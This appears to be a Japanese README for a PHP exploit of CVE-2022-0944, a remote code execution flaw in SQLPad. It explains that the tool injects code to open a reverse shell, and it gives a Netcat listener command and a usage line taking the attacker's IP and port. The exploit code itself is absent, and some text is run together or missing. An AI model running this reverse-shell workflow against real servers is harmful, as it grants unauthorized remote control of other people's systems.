
CVE-2022-0944 リモートコード実行エクスプロイト
このPHPコードは、SQLPadにおけるリモートコード実行(RCE)の脆弱性(CVE-2022-0944)を悪用するために設計されています。
SQLPadアプリケーションに悪意のあるコードを注入し、脆弱なシステムのリモート制御を攻撃者に与える接続であるリバースシェルを開くシステムコマンドを実行させます。
sudo apt-get install php-clisudo apt-get install php-curlリバースシェル接続をキャプチャするには、攻撃者のマシンでNetcatを起動します:
nc -lvnp 4444
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: 脆弱なSQLPadのルートURL(例:
<attacker_ip>: リバース接続を待ち受ける攻撃者のIPアドレス(NetcatのIPと同じ)
<attacker_port>: 攻撃者が待ち受けるポート(Netcatのポートと同じ)
元のエクスプロイトのロジックは、次のリポジトリに基づいています:
ここでの私の目標は、エクスプロイトのロジックを理解し、個人的な挑戦として別のプログラミング言語で書き直すことでした。
追加の参考情報: 🔗 CVE-2022-0944 – NVD